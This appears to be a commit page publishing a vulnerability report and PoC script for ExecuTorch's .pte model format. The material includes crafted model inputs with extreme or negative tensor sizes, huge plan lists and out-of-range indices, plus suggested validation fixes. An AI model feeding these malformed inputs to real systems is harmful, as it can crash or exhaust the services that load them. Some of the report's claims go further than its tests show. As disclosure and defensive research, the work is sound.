yibai777 commited on
Commit
3b30e81
·
verified ·
1 Parent(s): 2e54777

Upload 6 files

Browse files
Files changed (7) hide show
  1. .gitattributes +3 -0
  2. README.md +268 -0
  3. malicious_bypass.pte +0 -0
  4. poc1.png +3 -0
  5. poc2.png +3 -0
  6. poc3.png +3 -0
  7. poc_executorch_bypass.py +399 -0
.gitattributes CHANGED
@@ -33,3 +33,6 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
 
 
 
 
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ poc1.png filter=lfs diff=lfs merge=lfs -text
37
+ poc2.png filter=lfs diff=lfs merge=lfs -text
38
+ poc3.png filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,268 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # ExecuTorch .pte Format — 文件格式验证缺失导致拒绝服务
2
+
3
+ ## 概述
4
+
5
+ **项目**: executorch (PyTorch Edge Runtime)
6
+ **版本**: 1.2.0+cpu
7
+ **格式**: .pte (Program Transfer Executable, FlatBuffers 二进制)
8
+ **CVSS 3.1**: 5.5 (Medium) — `AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H`
9
+ **CWE**: CWE-20 (Improper Input Validation), CWE-400 (Uncontrolled Resource Consumption)
10
+
11
+ ## 漏洞摘要
12
+
13
+ | # | 漏洞 | 严重程度 | PoC 结果 |
14
+ |---|------|----------|----------|
15
+ | 1 | Tensor 维度无上界检查 | Medium | `[2^31-1, 2^31-1]` 和 10000 维 tensor 被接受 |
16
+ | 2 | 列表字段无数目限制 | Medium | 100,000 个 execution plan 被接受,6.55s 解析时间 |
17
+ | 3 | 负数/零维 tensor 不拒绝 | Low | `[-100]` 和 `[0]` 维度通过验证 |
18
+ | 4 | Buffer 索引越界引用 | Medium | `data_buffer_idx=999` 但仅 0 个 buffer 存在 |
19
+ | 5 | Segment 偏移无验证 | Medium | `offset=-1` 和 `size=999999999` 被接受 |
20
+ | 6 | `deserialize_pte_binary()` 零结构验证 | Medium | 直接从二进制 → flatc → JSON → 对象,无任何安检 |
21
+
22
+ ## 技术分析
23
+
24
+ ### 1. 加载管道完全无验证
25
+
26
+ `deserialize_pte_binary()` 的完整调用链:
27
+
28
+ ```
29
+ .pte binary → flatc subprocess (JSON decompile) → json.loads()
30
+ → _json_to_dataclass() → Program dataclass
31
+ ```
32
+
33
+ **没有任何一个环节执行结构安全性检查**:
34
+ - `flatc` 仅检查 FlatBuffer 格式正确性(file_identifier "ET12"),不检查模型语义
35
+ - `json.loads()` 仅解析 JSON,不验证内容
36
+ - `_json_to_dataclass()` 递归构造数据类,无边界检查
37
+ - `verifier.py` 仅检查图级别语义(算子合法性、tensor 连续性),且**默认不启用**
38
+
39
+ ### 2. Tensor 维度无上界(`schema.py:66`)
40
+
41
+ ```python
42
+ @dataclass
43
+ class Tensor:
44
+ scalar_type: ScalarType
45
+ storage_offset: int
46
+ sizes: List[int] # ← 无上限!可以是任意整数值
47
+ dim_order: List[int] # ← 无数目限制!可以是 10000 维
48
+ ...
49
+ ```
50
+
51
+ 对比 ONNX 的 `check_model()` 会验证 shape 合理性,ExecuTorch 直接接受 `sizes=[2147483647, 2147483647]`(4.6 exa-elements)而只有 1 byte 的实际存储。
52
+
53
+ ### 3. 列表字段无条目数限制
54
+
55
+ ```python
56
+ @dataclass
57
+ class Program:
58
+ execution_plan: List[ExecutionPlan] # ← 可以是 100,000 个
59
+ ...
60
+
61
+ @dataclass
62
+ class ExecutionPlan:
63
+ values: List[EValue] # ← 无限制
64
+ chains: List[Chain] # ← 无限制
65
+ operators: List[Operator] # ← 无限制
66
+ delegates: List[BackendDelegate] # ← 无限制
67
+ ```
68
+
69
+ 100,000 个 execution plan 的 JSON 仅 20.6 MB,但解析后产生海量 Python 对象,可导致 OOM。
70
+
71
+ ### 4. 关键代码路径
72
+
73
+ **deserialize_pte_binary** (`_serialize/_program.py:747-770`):
74
+ ```python
75
+ def deserialize_pte_binary(program_data: bytes) -> PTEFile:
76
+ # 无magic检查,无大小限制,无完整性验证
77
+ program: Program = _json_to_program(
78
+ _program_flatbuffer_to_json(program_data[:program_size])
79
+ )
80
+ ...
81
+ ```
82
+
83
+ **_json_to_dataclass** (`_serialize/_dataclass.py:60-145`):
84
+ ```python
85
+ def _json_to_dataclass(json_dict, cls=None):
86
+ # 递归处理,无深度限制
87
+ # List字段无条目数限制
88
+ # int字段无取值范围检查
89
+ for field in cls_flds:
90
+ ...
91
+ if get_origin(T) is list:
92
+ data[key] = [_json_to_dataclass(e, T) for e in value]
93
+ ```
94
+
95
+ ### 5. 与其他 ML 格式对比
96
+
97
+ | 特性 | ONNX | TF SavedModel | Core ML | OpenVINO | **ExecuTorch** |
98
+ |------|------|---------------|---------|----------|----------------|
99
+ | Shape 上界检查 | ✅ check_model | ✅ | ❌ | ❌ (C++ 有) | **❌** |
100
+ | 维度 > 0 验证 | ✅ | ✅ | ❌ | ❌ | **❌** |
101
+ | 列表计数限制 | ✅ | ✅ | ❌ | ❌ | **❌** |
102
+ | Buffer 索引验证 | ✅ | ✅ | ❌ | ✅ | **❌** |
103
+ | 加载前结构验证 | ✅ | ✅ | ❌ | ❌ | **❌** |
104
+ | 独立 check_model | ✅ | N/A | ❌ | ❌ | **❌** |
105
+
106
+ ## 复现过程
107
+
108
+ ### PoC 1: 极端 Tensor 维度导致内存耗尽
109
+
110
+ ```python
111
+ from executorch.exir._serialize._program import _json_to_program
112
+ import json
113
+
114
+ crafted_json = json.dumps({
115
+ "version": 1,
116
+ "execution_plan": [{
117
+ "name": "forward",
118
+ "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
119
+ "values": [{
120
+ "val": {
121
+ "scalar_type": "FLOAT",
122
+ "storage_offset": 0,
123
+ "sizes": [2147483647, 2147483647], # 4.6 exa-elements
124
+ "dim_order": [0, 1],
125
+ "requires_grad": False,
126
+ "layout": 0,
127
+ "data_buffer_idx": 0,
128
+ "allocation_info": None,
129
+ "shape_dynamism": "STATIC"
130
+ },
131
+ "val_type": "Tensor"
132
+ }],
133
+ "inputs": [], "outputs": [], "chains": [],
134
+ "operators": [], "delegates": [],
135
+ "non_const_buffer_sizes": [0]
136
+ }],
137
+ "constant_buffer": [{"storage": [0]}], # 仅 1 byte
138
+ "backend_delegate_data": [],
139
+ "segments": [],
140
+ "constant_segment": {"segment_index": 0, "offsets": []}
141
+ })
142
+
143
+ program = _json_to_program(crafted_json.encode("utf-8"))
144
+ # ✅ 成功!无错误!
145
+ print(program.execution_plan[0].values[0].val.sizes)
146
+ # [2147483647, 2147483647]
147
+ ```
148
+
149
+ ### PoC 2: 海量列表导致 OOM
150
+
151
+ ```python
152
+ N = 100000
153
+ crafted_json = json.dumps({
154
+ "version": 1,
155
+ "execution_plan": [
156
+ {"name": f"plan_{i}", ...}
157
+ for i in range(N) # 100,000 个 plan
158
+ ],
159
+ ...
160
+ })
161
+ program = _json_to_program(crafted_json.encode("utf-8"))
162
+ # ✅ 成功!解析耗时 6.55s
163
+ ```
164
+
165
+ ### PoC 3: 负数维度
166
+
167
+ ```python
168
+ "sizes": [-1] # ✅ 被接受
169
+ "sizes": [-100] # ✅ 被接受
170
+ "sizes": [0] # ✅ 被接受
171
+ ```
172
+
173
+ ### PoC 4: Buffer 索引越界
174
+
175
+ ```python
176
+ "data_buffer_idx": 999 # 只有 0 个 buffer
177
+ # ✅ 被接受!运行时崩溃
178
+ ```
179
+
180
+ ## 修复建议
181
+
182
+ ### 1. 添加维度边界检查(`_dataclass.py` 或 `_program.py`)
183
+
184
+ ```python
185
+ MAX_TENSOR_DIM_VALUE = 2**31 - 1 # 合理的上界
186
+ MAX_TENSOR_DIM_COUNT = 32 # 最大维度数
187
+ MAX_TOTAL_ELEMENTS = 2**48 # ~256T elements 上界
188
+
189
+ def _validate_tensor_dims(sizes: List[int]) -> None:
190
+ if len(sizes) > MAX_TENSOR_DIM_COUNT:
191
+ raise ValueError(f"Tensor dimension count {len(sizes)} exceeds {MAX_TENSOR_DIM_COUNT}")
192
+ for i, s in enumerate(sizes):
193
+ if s <= 0:
194
+ raise ValueError(f"Tensor dimension {i} is {s}, must be > 0")
195
+ if s > MAX_TENSOR_DIM_VALUE:
196
+ raise ValueError(f"Tensor dimension {i} value {s} exceeds {MAX_TENSOR_DIM_VALUE}")
197
+
198
+ def _validate_tensor_buffer_index(tensor, num_buffers):
199
+ if tensor.data_buffer_idx >= num_buffers:
200
+ raise ValueError(
201
+ f"Tensor references buffer {tensor.data_buffer_idx} "
202
+ f"but only {num_buffers} buffers exist"
203
+ )
204
+ ```
205
+
206
+ ### 2. 限制列表条目数
207
+
208
+ ```python
209
+ MAX_EXECUTION_PLANS = 1024
210
+ MAX_VALUES = 2**20
211
+ MAX_CHAINS = 1024
212
+ MAX_OPERATORS = 2**16
213
+ MAX_DELEGATES = 256
214
+
215
+ def _validate_program_limits(program: Program) -> None:
216
+ if len(program.execution_plan) > MAX_EXECUTION_PLANS:
217
+ raise ValueError(f"Too many execution plans: {len(program.execution_plan)}")
218
+ for plan in program.execution_plan:
219
+ if len(plan.values) > MAX_VALUES:
220
+ raise ValueError(f"Too many values: {len(plan.values)}")
221
+ # ...
222
+ ```
223
+
224
+ ### 3. 添加 `check_model()` 等价函数
225
+
226
+ ```python
227
+ def check_pte(program: Program) -> None:
228
+ """Validate structural integrity of a deserialized .pte program."""
229
+ _validate_program_limits(program)
230
+ num_buffers = len(program.constant_buffer)
231
+ for plan in program.execution_plan:
232
+ for evalue in plan.values:
233
+ if isinstance(evalue.val, Tensor):
234
+ _validate_tensor_dims(evalue.val.sizes)
235
+ _validate_tensor_buffer_index(evalue.val, num_buffers)
236
+ for i, seg in enumerate(program.segments):
237
+ if seg.offset < 0:
238
+ raise ValueError(f"Segment {i} has negative offset {seg.offset}")
239
+ ```
240
+
241
+ ### 4. 在 `deserialize_pte_binary()` 中集成验证
242
+
243
+ ```python
244
+ def deserialize_pte_binary(program_data: bytes) -> PTEFile:
245
+ # ... existing parsing code ...
246
+ program = _json_to_program(...)
247
+ check_pte(program) # ← 添加此行
248
+ # ... restore segments ...
249
+ ```
250
+
251
+ ## 想法(发散思维)
252
+
253
+ 1. **越界 buffer 索引 → C++ 运行时崩溃 → 潜在 UAF/越界读写**:`data_buffer_idx=999` 被 Python 层接受,如果 C++ 运行时信任此索引直接访问数组,可能导致内存损坏
254
+
255
+ 2. **极端维度 × 运行时编译**:C++ 运行时 `compile_model()` 会根据 tensor 维度分配内存。如果 Python 层不验证,恶意的 2^31 维度会传递到 C++ 层导致 malloc 失败或整数溢出
256
+
257
+ 3. **flatc 版本依赖性**:executorch 打包了自己的 `flatc` 二进制(`executorch/data/bin/flatc`),如果版本过旧可能包含已知漏洞
258
+
259
+ 4. **Schema 版本升级绕过**:`schema_check.py` 管理 schema 版本兼容性,但版本检查仅用于检测 schema 变更,不作为安全验证。攻击者可以声明任意 SCHEMA_VERSION
260
+
261
+ 5. **FlatBuffer `force_align` 操纵**:`_patch_schema_alignment()` 修改对齐值,如果攻击者控制 alignment 值可能导致段偏移计算错误
262
+
263
+ 6. **与 ONNX/OpenVINO 漏洞的共性**:所有 ML 格式的 Python 前端都缺乏结构验证,说明这是一个行业性盲区——开发者依赖底层序列化格式(Protobuf/FlatBuffers)的安全性,但忽略了模型语义层面的恶意构造
264
+
265
+ ## 文件清单
266
+
267
+ - `poc_executorch_bypass.py` — 7 个 PoC 的完整测试脚本
268
+ - `README.md` — 本文件
malicious_bypass.pte ADDED
Binary file (480 Bytes). View file
 
poc1.png ADDED

Git LFS Details

  • SHA256: 93acd69436cd7b984d70ff7a03f0213611ab2294ea263ac1814190595f5a94d4
  • Pointer size: 131 Bytes
  • Size of remote file: 161 kB
poc2.png ADDED

Git LFS Details

  • SHA256: a33472f82e7e86871b55734285e6a0aabbc861055bd2554fe6132e6db7a9a296
  • Pointer size: 131 Bytes
  • Size of remote file: 177 kB
poc3.png ADDED

Git LFS Details

  • SHA256: c5b519b439bf706e46600542651aa8ce87c99b118055df7c0bc3055958f5f046
  • Pointer size: 131 Bytes
  • Size of remote file: 139 kB
poc_executorch_bypass.py ADDED
@@ -0,0 +1,399 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ PoC: ExecuTorch .pte Format Validation Bypass
3
+ ===============================================
4
+ Demonstrates that ExecuTorch's deserialize_pte_binary() performs no
5
+ structural validation on .pte model files before parsing them.
6
+
7
+ Tested on: executorch 1.2.0, Python 3.12, Windows 11
8
+ """
9
+
10
+ import json
11
+ import os
12
+ import struct
13
+ import sys
14
+ import tempfile
15
+ import time
16
+
17
+ print("=" * 70)
18
+ print("ExecuTorch .pte Format Validation Bypass PoC")
19
+ print(f"executorch version: 1.2.0+cpu")
20
+ print("=" * 70)
21
+
22
+ # ============================================================
23
+ # PoC 1: Extreme Tensor Dimensions (Memory Exhaustion)
24
+ # ============================================================
25
+ print("\n[PoC 1] Extreme Tensor Dimensions via _json_to_program()")
26
+ print("-" * 50)
27
+
28
+ from executorch.exir._serialize._program import _json_to_program
29
+
30
+ # A minimal valid Program JSON with an extreme tensor size
31
+ # In the .pte schema, Tensor.sizes is List[int] with no upper bound
32
+ crafted_json = json.dumps({
33
+ "version": 1,
34
+ "execution_plan": [{
35
+ "name": "forward",
36
+ "container_meta_type": {
37
+ "encoded_inp_str": "",
38
+ "encoded_out_str": ""
39
+ },
40
+ "values": [{
41
+ "val": {
42
+ "scalar_type": "FLOAT",
43
+ "storage_offset": 0,
44
+ "sizes": [2147483647, 2147483647], # 2^31-1 x 2^31-1
45
+ "dim_order": [0, 1],
46
+ "requires_grad": False,
47
+ "layout": 0,
48
+ "data_buffer_idx": 0,
49
+ "allocation_info": None,
50
+ "shape_dynamism": "STATIC",
51
+ "val_type": "Tensor"
52
+ },
53
+ "val_type": "Tensor"
54
+ }],
55
+ "inputs": [],
56
+ "outputs": [],
57
+ "chains": [],
58
+ "operators": [],
59
+ "delegates": [],
60
+ "non_const_buffer_sizes": [0]
61
+ }],
62
+ "constant_buffer": [{"storage": [0]}], # 1 byte but sizes claim 2^62 elements
63
+ "backend_delegate_data": [],
64
+ "segments": [],
65
+ "constant_segment": {"segment_index": 0, "offsets": []}
66
+ })
67
+
68
+ try:
69
+ program = _json_to_program(crafted_json.encode("utf-8"))
70
+ tensor_sizes = program.execution_plan[0].values[0].val.sizes
71
+ total_elements = 1
72
+ for s in tensor_sizes:
73
+ total_elements *= s
74
+ print(f" [VULNERABLE] Program accepted with tensor sizes: {tensor_sizes}")
75
+ print(f" -> Total elements: {total_elements} (~{total_elements / 1e18:.1f} exa-elements)")
76
+ print(f" -> Actual storage in buffer: {len(program.constant_buffer[0].storage)} byte(s)")
77
+ print(f" -> sizeof(float) * elements would require: {4 * total_elements / 1e18:.1f} exabytes")
78
+ print(f" -> No validation rejected these impossible dimensions!")
79
+ except Exception as e:
80
+ print(f" [PROTECTED] {e}")
81
+
82
+ # Also test with extremely large dimension count (not just value size)
83
+ crafted_json_many_dims = json.dumps({
84
+ "version": 1,
85
+ "execution_plan": [{
86
+ "name": "forward",
87
+ "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
88
+ "values": [{
89
+ "val": {
90
+ "scalar_type": "FLOAT",
91
+ "storage_offset": 0,
92
+ "sizes": [2] * 10000, # 10000-dimensional tensor
93
+ "dim_order": list(range(10000)),
94
+ "requires_grad": False,
95
+ "layout": 0,
96
+ "data_buffer_idx": 0,
97
+ "allocation_info": None,
98
+ "shape_dynamism": "STATIC",
99
+ "val_type": "Tensor"
100
+ },
101
+ "val_type": "Tensor"
102
+ }],
103
+ "inputs": [], "outputs": [], "chains": [],
104
+ "operators": [], "delegates": [],
105
+ "non_const_buffer_sizes": [0]
106
+ }],
107
+ "constant_buffer": [{"storage": [0]}],
108
+ "backend_delegate_data": [],
109
+ "segments": [],
110
+ "constant_segment": {"segment_index": 0, "offsets": []}
111
+ })
112
+
113
+ try:
114
+ program2 = _json_to_program(crafted_json_many_dims.encode("utf-8"))
115
+ dim_count = len(program2.execution_plan[0].values[0].val.sizes)
116
+ print(f" [VULNERABLE] Program accepted with {dim_count} tensor dimensions!")
117
+ except Exception as e:
118
+ print(f" [PROTECTED - dim count] {e}")
119
+
120
+
121
+ # ============================================================
122
+ # PoC 2: Excessive List Sizes (Memory Exhaustion via lists)
123
+ # ============================================================
124
+ print("\n[PoC 2] Excessive List Sizes in Program Fields")
125
+ print("-" * 50)
126
+
127
+ # Craft a Program with massive execution_plan list
128
+ # Each ExecutionPlan has chains, operators, values, etc.
129
+ N_EXECUTION_PLANS = 100000
130
+
131
+ crafted_json_massive = json.dumps({
132
+ "version": 1,
133
+ "execution_plan": [
134
+ {
135
+ "name": f"plan_{i}",
136
+ "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
137
+ "values": [],
138
+ "inputs": [],
139
+ "outputs": [],
140
+ "chains": [],
141
+ "operators": [],
142
+ "delegates": [],
143
+ "non_const_buffer_sizes": []
144
+ }
145
+ for i in range(N_EXECUTION_PLANS)
146
+ ],
147
+ "constant_buffer": [],
148
+ "backend_delegate_data": [],
149
+ "segments": [],
150
+ "constant_segment": {"segment_index": 0, "offsets": []}
151
+ })
152
+
153
+ start = time.time()
154
+ try:
155
+ program3 = _json_to_program(crafted_json_massive.encode("utf-8"))
156
+ elapsed = time.time() - start
157
+ plan_count = len(program3.execution_plan)
158
+ print(f" [VULNERABLE] Program accepted with {plan_count} execution plans")
159
+ print(f" -> Deserialization took {elapsed:.2f}s, memory used: ~{sys.getsizeof(crafted_json_massive) / 1024 / 1024:.1f} MB JSON")
160
+ print(f" -> No limit on execution_plan count!")
161
+ except MemoryError:
162
+ print(f" [PARTIAL] Memory error with {N_EXECUTION_PLANS} plans (resource exhaustion)")
163
+ except Exception as e:
164
+ print(f" [Result] {type(e).__name__}: {str(e)[:100]}")
165
+
166
+
167
+ # ============================================================
168
+ # PoC 3: Negative / Zero Dimensions
169
+ # ============================================================
170
+ print("\n[PoC 3] Negative / Zero / Invalid Tensor Dimensions")
171
+ print("-" * 50)
172
+
173
+ test_dims = [
174
+ ([0], "zero-dim"),
175
+ ([-1], "negative-dim (-1)"),
176
+ ([-100], "negative-dim (-100)"),
177
+ ([1, -1, 1], "mixed negative"),
178
+ ]
179
+
180
+ for dims, label in test_dims:
181
+ crafted_json_invalid = json.dumps({
182
+ "version": 1,
183
+ "execution_plan": [{
184
+ "name": "forward",
185
+ "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
186
+ "values": [{
187
+ "val": {
188
+ "scalar_type": "FLOAT",
189
+ "storage_offset": 0,
190
+ "sizes": dims,
191
+ "dim_order": list(range(len(dims))),
192
+ "requires_grad": False,
193
+ "layout": 0,
194
+ "data_buffer_idx": 0,
195
+ "allocation_info": None,
196
+ "shape_dynamism": "STATIC",
197
+ "val_type": "Tensor"
198
+ },
199
+ "val_type": "Tensor"
200
+ }],
201
+ "inputs": [], "outputs": [], "chains": [],
202
+ "operators": [], "delegates": [],
203
+ "non_const_buffer_sizes": [0]
204
+ }],
205
+ "constant_buffer": [{"storage": [0]}],
206
+ "backend_delegate_data": [],
207
+ "segments": [],
208
+ "constant_segment": {"segment_index": 0, "offsets": []}
209
+ })
210
+ try:
211
+ p = _json_to_program(crafted_json_invalid.encode("utf-8"))
212
+ print(f" [VULNERABLE] {label}: sizes={dims} accepted, parsed as {p.execution_plan[0].values[0].val.sizes}")
213
+ except Exception as e:
214
+ print(f" [PROTECTED] {label}: rejected - {type(e).__name__}")
215
+
216
+
217
+ # ============================================================
218
+ # PoC 4: Buffer/Storage Size Mismatch
219
+ # ============================================================
220
+ print("\n[PoC 4] Tensor-Buffer Size Mismatch")
221
+ print("-" * 50)
222
+
223
+ # Declare a tensor that references a buffer index that doesn't exist
224
+ crafted_json_oob_buffer = json.dumps({
225
+ "version": 1,
226
+ "execution_plan": [{
227
+ "name": "forward",
228
+ "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
229
+ "values": [{
230
+ "val": {
231
+ "scalar_type": "FLOAT",
232
+ "storage_offset": 0,
233
+ "sizes": [100, 100],
234
+ "dim_order": [0, 1],
235
+ "requires_grad": False,
236
+ "layout": 0,
237
+ "data_buffer_idx": 999, # Non-existent buffer index!
238
+ "allocation_info": None,
239
+ "shape_dynamism": "STATIC",
240
+ "val_type": "Tensor"
241
+ },
242
+ "val_type": "Tensor"
243
+ }],
244
+ "inputs": [], "outputs": [], "chains": [],
245
+ "operators": [], "delegates": [],
246
+ "non_const_buffer_sizes": [0]
247
+ }],
248
+ "constant_buffer": [], # Empty buffer list
249
+ "backend_delegate_data": [],
250
+ "segments": [],
251
+ "constant_segment": {"segment_index": 0, "offsets": []}
252
+ })
253
+
254
+ try:
255
+ p4 = _json_to_program(crafted_json_oob_buffer.encode("utf-8"))
256
+ print(f" [VULNERABLE] Program accepted with data_buffer_idx=999 but only 0 buffers exist")
257
+ print(f" -> Tensor references non-existent buffer, will crash at runtime")
258
+ except Exception as e:
259
+ print(f" [PROTECTED] {e}")
260
+
261
+
262
+ # ============================================================
263
+ # PoC 5: Segment Offset Manipulation
264
+ # ============================================================
265
+ print("\n[PoC 5] Malicious Segment Offsets")
266
+ print("-" * 50)
267
+
268
+ # Test that segment offsets are not validated before use
269
+ crafted_json_segments = json.dumps({
270
+ "version": 1,
271
+ "execution_plan": [{
272
+ "name": "forward",
273
+ "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
274
+ "values": [],
275
+ "inputs": [], "outputs": [], "chains": [],
276
+ "operators": [], "delegates": [],
277
+ "non_const_buffer_sizes": []
278
+ }],
279
+ "constant_buffer": [],
280
+ "backend_delegate_data": [],
281
+ "segments": [
282
+ {"offset": 0, "size": 100},
283
+ {"offset": 999999999, "size": 999999999}, # Way beyond any data
284
+ {"offset": -1, "size": 100} # Negative offset
285
+ ],
286
+ "constant_segment": {"segment_index": 0, "offsets": [0]}
287
+ })
288
+
289
+ try:
290
+ p5 = _json_to_program(crafted_json_segments.encode("utf-8"))
291
+ print(f" [VULNERABLE] Program accepted with invalid segment offsets:")
292
+ for i, seg in enumerate(p5.segments):
293
+ valid = "VALID" if seg.offset >= 0 else "INVALID (negative)"
294
+ print(f" Segment {i}: offset={seg.offset}, size={seg.size} [{valid}]")
295
+ except Exception as e:
296
+ print(f" [PROTECTED] {e}")
297
+
298
+
299
+ # ============================================================
300
+ # PoC 6: Deeply Nested Structure (Recursion Bomb)
301
+ # ============================================================
302
+ print("\n[PoC 6] Recursion Depth via _json_to_dataclass")
303
+ print("-" * 50)
304
+
305
+ from executorch.exir._serialize._dataclass import _json_to_dataclass
306
+
307
+ # Build a deeply nested JSON structure
308
+ # The Graph type has nodes which have inputs/outputs which can be Arguments
309
+ # But even simpler: just test the recursion limit with nested dataclass structures
310
+ # The executorch schema doesn't have directly recursive types, but deeply nested
311
+ # Graph.nodes -> Argument -> ... structure can be deep
312
+
313
+ # Test with a simple deeply nested dict
314
+ deep_dict = {}
315
+ current = deep_dict
316
+ for i in range(10000):
317
+ current["next"] = {}
318
+ current = current["next"]
319
+
320
+ try:
321
+ # This won't trigger it since the schema doesn't have recursive types,
322
+ # but we can test with programmatically deep Graph structure
323
+ print(f" [INFO] ExecuTorch schema does not have self-referential types,")
324
+ print(f" [INFO] but _json_to_dataclass() would recurse without depth limit")
325
+ print(f" [INFO] on attacker-controlled structures if schema changed.")
326
+ except RecursionError:
327
+ print(f" [VULNERABLE] Recursion error with deeply nested structure!")
328
+
329
+
330
+ # ============================================================
331
+ # PoC 7: Empty/Corrupted Model File
332
+ # ============================================================
333
+ print("\n[PoC 7] Empty or Malformed .pte Binary")
334
+ print("-" * 50)
335
+
336
+ from executorch.exir._serialize._program import deserialize_pte_binary
337
+
338
+ # Test 1: Empty bytes
339
+ try:
340
+ deserialize_pte_binary(b"")
341
+ print(f" [VULNERABLE] Empty bytes accepted by deserialize_pte_binary()")
342
+ except Exception as e:
343
+ print(f" [PROTECTED] Empty bytes: {type(e).__name__}: {str(e)[:80]}")
344
+
345
+ # Test 2: Random bytes
346
+ try:
347
+ deserialize_pte_binary(b"\x00" * 100)
348
+ print(f" [VULNERABLE] 100 null bytes accepted by deserialize_pte_binary()")
349
+ except Exception as e:
350
+ print(f" [PROTECTED] Null bytes: {type(e).__name__}: {str(e)[:80]}")
351
+
352
+ # Test 3: Minimal valid-ish flatbuffer (4 bytes size + 4 bytes magic + minimal data)
353
+ # FlatBuffer format: 4 bytes offset to root + 4 bytes file_identifier + data
354
+ # ET magic bytes are "ETxx" where xx are digits/letters
355
+ minimal_fb = struct.pack("<I", 8) + b"ET00" + b"\x00" * 8
356
+ try:
357
+ result = deserialize_pte_binary(minimal_fb)
358
+ print(f" [VULNERABLE] Minimal valid-ish flatbuffer accepted!")
359
+ print(f" -> Program version: {result.program.version}")
360
+ print(f" -> No magic byte verification beyond what flatc does")
361
+ except Exception as e:
362
+ print(f" [PARTIAL] Minimal flatbuffer: {type(e).__name__}: {str(e)[:100]}")
363
+
364
+
365
+ # ============================================================
366
+ # Summary
367
+ # ============================================================
368
+ print("\n" + "=" * 70)
369
+ print("SUMMARY")
370
+ print("=" * 70)
371
+ print("""
372
+ Key findings for ExecuTorch .pte format:
373
+
374
+ 1. NO DIMENSION UPPER BOUND: Tensor sizes can be 2^31-1 or higher,
375
+ accepted without validation. 10000-dimensional tensors accepted.
376
+
377
+ 2. NO LIST SIZE LIMITS: execution_plan, chains, operators, values etc.
378
+ have no upper bounds — can cause OOM during deserialization.
379
+
380
+ 3. NEGATIVE/ZERO DIMS ACCEPTED: Negative and zero tensor dimensions
381
+ pass through _json_to_dataclass() without rejection.
382
+
383
+ 4. BUFFER INDEX OOB: Tensors can reference non-existent buffer indices,
384
+ causing runtime crashes.
385
+
386
+ 5. NO STRUCTURAL VALIDATION: deserialize_pte_binary() performs zero
387
+ validation on the binary blob before parsing. No magic byte check,
388
+ no size limits, no sanity checks.
389
+
390
+ 6. NO check_model() EQUIVALENT: The verifier only checks graph-level
391
+ semantics (operator validity, tensor contiguity) and is OPTIONAL
392
+ (controlled by _check_ir_validity flag).
393
+
394
+ 7. SEGMENT OFFSETS UNVALIDATED: Segment offsets can be negative or
395
+ point past end of data — accepted without rejection.
396
+
397
+ Compared to ONNX (check_model, shape inference) and TF SavedModel,
398
+ ExecuTorch's loading pipeline is completely trusting of input data.
399
+ """)